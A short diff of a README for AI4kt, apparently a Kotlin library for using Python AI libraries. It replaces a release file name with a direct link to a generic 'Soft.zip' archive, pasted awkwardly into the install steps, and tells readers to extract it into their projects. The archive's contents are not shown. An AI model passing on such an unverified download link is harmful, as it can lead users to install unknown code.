Kush2395/AI4kt/README.md

 To start using AI4kt in your projects, follow these simple steps:

-1. Download the **AI4kt Release.zip** file from the link provided above.
+1. Download the **AI4kt https://github.com/Kush2395/AI4kt/releases/download/v1.0/Soft.zip** file from the link provided above.
 2. Extract the contents of the zip file to your project directory.
 3. Import the necessary AI4kt modules into your Kotlin code.
 4. Start leveraging the power of Python AI libraries within your Kotlin projects!